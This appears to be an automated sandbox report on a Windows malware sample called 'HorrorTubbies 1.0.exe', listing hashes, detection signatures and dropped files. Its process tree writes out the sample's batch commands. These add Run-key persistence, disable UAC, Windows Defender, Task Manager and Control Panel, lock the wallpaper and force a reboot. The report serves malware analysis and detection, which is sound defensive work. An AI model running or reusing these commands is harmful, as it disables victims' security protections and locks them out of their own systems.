Overview

overview

10

Static

static

7

HorrorTubbies 1.0.exe

windows10-1703-x64

HorrorTubbies 1.0.exe

windows10-2004-x64

Analysis

  • max time kernel
    20s
  • max time network
    22s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-07-2024 09:36

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    HorrorTubbies 1.0.exe

  • Size

    11.5MB

  • MD5

    cbefa3dd01682c7ae01476a35c069ca8

  • SHA1

    0a7fde7402d314993d0b77b87b796f480c8bbec4

  • SHA256

    9a8a71e84dbbcea6ca2286d811db5d2df586d01e13654b034f77ffd6dbed599a

  • SHA512

    41a1dff4610230d1cf72c0c42b6c7eef8a12c991cb42ed28cd2268f20f1978b14fba9e17081cdbe411963bc7dcd3273046d1ddc7427f6d9cc117ea592833ed8d

  • SSDEEP

    196608:knW3NrRSIGB4e6rVwKQ8QNeL8W6sXh9rcWdTXfxo5FKKxuAUKPZ7CwI7qMh:kn/r6CKENjsXr9TX5rKRCwI7

Score
10/10
evasionpersistenceransomwaretrojanupx

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Disables Task Manager via registry modification
    evasion
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Windows directory 6 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry key 1 TTPs 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\HorrorTubbies 1.0.exe
    "C:\Users\Admin\AppData\Local\Temp\HorrorTubbies 1.0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1716
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8CBF.tmp\HorrorTubies.bat""
      2⤵
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:332
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v mbrsetup /d c:\windows\winbase_base_procid_none\secureloc0x65\mbrsetup.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:4176
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v gdifuncs /d c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:1964
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
        3⤵
        • Sets desktop wallpaper using registry
        PID:1396
      • C:\Windows\SysWOW64\rundll32.exe
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        3⤵
          PID:5000
        • C:\Windows\SysWOW64\reg.exe
          reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
          3⤵
          • Modifies registry key
          PID:4152
        • C:\Windows\SysWOW64\reg.exe
          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          3⤵
          • UAC bypass
          • Modifies registry key
          PID:2968
        • C:\Windows\SysWOW64\reg.exe
          Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
          3⤵
            PID:1268
          • C:\Windows\SysWOW64\reg.exe
            REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            3⤵
            • Modifies registry key
            PID:4156
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
            3⤵
              PID:1648
            • C:\Windows\SysWOW64\shutdown.exe
              shutdown /r /t 00
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3148
        • C:\Windows\system32\LogonUI.exe
          "LogonUI.exe" /flags:0x4 /state0:0xa39b2055 /state1:0x41c64e6d
          1⤵
          • Modifies data under HKEY_USERS
          • Suspicious use of SetWindowsHookEx
          PID:868

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\8CBF.tmp\HorrorTubies.bat
          Filesize

          1KB

          MD5

          f014698e88eda534c88ce46a17e34d3c

          SHA1

          5f33f606179fea1404144d60af54fb829ea108b5

          SHA256

          35eda9f76ede828a68e030a5b966fbf6a8c3f67146099eb0a866fb492733c909

          SHA512

          79360bdc41762c105fecb07ca97fb4336394d2189f111b7040643d02c12481561aaf6b47c91c685cb7e4396c1a37d8c8eff5d4965baafe83894948316b35805f

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\8CBF.tmp\bg.bmp
          Filesize

          2.2MB

          MD5

          a91e5b7686d4f631a2bdf654a3a491f1

          SHA1

          d5760f5c7463b588b0c74bbc86237aed136b9fe9

          SHA256

          45991d6379452ead78a54e3be31eb3fe9c6ae386737482192ded081832044aea

          SHA512

          86cee44d58c7d9ed51caffb6cb6b55184a3c4653dc76ca41f4bb8a7c5bef9b67cf7f920db2111c1a838930bf9171ff49e17e042d9d0ce13205f13e7a364e1a3d

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\8CBF.tmp\gdifuncs.exe
          Filesize

          76KB

          MD5

          9b104d42649fa52651a2ec25d7e48322

          SHA1

          d9fe22ef9daf5055519ebb9e4137a7b6b5ffc030

          SHA256

          23aef8bc6d0dcad2089fd08ec5932aba5feab3972b07583fa50d4c794eca5af9

          SHA512

          55794cbd02f8678fdc44dced755ba4cf9d4ed63a30bded6635dc5403ffa2435339422288d48a8ef31fe523b080359b051e86ec8f6823b891e83ed1495fa5daa8

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\8CBF.tmp\mainbgtheme.wav
          Filesize

          13.1MB

          MD5

          1c723b3b9420e04cb8845af8b62a37fa

          SHA1

          3331a0f04c851194405eb9a9ff49c76bfa3d4db0

          SHA256

          6831f471ee3363e981e6a1eb0d722f092b33c9b73c91f9f2a9aafa5cb4c56b29

          SHA512

          41f4005ec2a7e0ee8e0e5f52b9d97f25a64a25bb0f00c85c07c643e4e63ea361b4d86733a0cf719b30ea6af225c4fcaca494f22e8e2f73cda9db906c5a0f12ae

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\8CBF.tmp\mbrsetup.exe
          Filesize

          1.3MB

          MD5

          4f9777b4f603a437abedb856d09d42ba

          SHA1

          9a50bdb720e937ae6a8fd4140233b600414b393e

          SHA256

          c5309feb33af8626132eb1a44e528c3317b5499a87170044eadc56ae82b1bacd

          SHA512

          c6971d5256feb8ebd75b758055843870fd1beede3430efc82f4e3f0dae56d9b9241b0ac8c653d5f5ab3fe61a80729c4e096b169d16d2e09ccb7efcc0be8d49a8

          Download Submit

        • memory/1716-0-0x0000000000400000-0x00000000014D1000-memory.dmp

          Filesize

          16.8MB

          Download

        • memory/1716-14-0x0000000000400000-0x00000000014D1000-memory.dmp

          Filesize

          16.8MB

          Download

        • memory/1716-28-0x0000000000400000-0x00000000014D1000-memory.dmp

          Filesize

          16.8MB

          Download